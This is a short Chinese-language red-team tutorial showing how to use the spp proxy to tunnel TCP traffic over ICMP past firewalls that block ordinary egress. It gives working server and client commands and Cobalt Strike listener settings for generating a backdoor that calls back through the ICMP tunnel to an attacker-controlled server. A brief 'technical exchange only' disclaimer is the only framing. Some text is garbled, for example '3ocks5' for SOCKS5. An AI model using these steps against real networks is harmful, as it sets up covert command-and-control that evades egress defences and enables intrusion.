免責聲明:本文僅做技術交流與學習...

目錄

spp項目:

一圖通解:

1-下載spp

2-服務端執行命令

3-客戶端執行命令

4-服務端cs監聽&生馬

---

spp項目:

GitHub - esrrhs/spp: A simple and powerful proxy

支持的協議：tcp、udp、udp、icmp、http、kcp、quic
支持的類型：正向代理、反向代理、3ocks5正向代理、3ocks5反向代理
在對抗項目中有遇到過一些極端環境，比如目標封了tcp，http等常用出網的協議，但是icmp，dns等協議可能因為業務需要或者管理者安全意識不到位導致沒有封干凈。在這種場景下就可以使用這些容易被忽視的協議進行隧道的搭建。

--這里演示其隧道技術.(解決協議被封殺的問題)

---

一圖通解:

---

1-下載spp

GitHub - esrrhs/spp: A simple and powerful proxy

服務端下載Linux版.

客戶端下載windows版.

(這個項目對虛擬機可能是不大支持,不要放到虛擬機上.)

---

2-服務端執行命令

./spp -type server -proto ricmp -listen 0.0.0.0

?

3-客戶端執行命令

spp -name "test" -type proxy_client -server <IP> -fromaddr :8086 -toaddr :8087 -proxyproto tcp -proto ricmp

--與服務端建立連接.?

將本地的8086給到服務端的8087上.

（TCP封裝icmp）

?

4-服務端cs監聽&生馬

監聽器1:? ? ? ? spp1? ? ? ? 服務端IP? ? ? ? 8087

監聽器2:? ? ? ? spp2? ? ? ? 127.0.0.1? ? ? ? 8086

生成后門(綁定監聽器2)

--最后上線的是監聽器1的.

---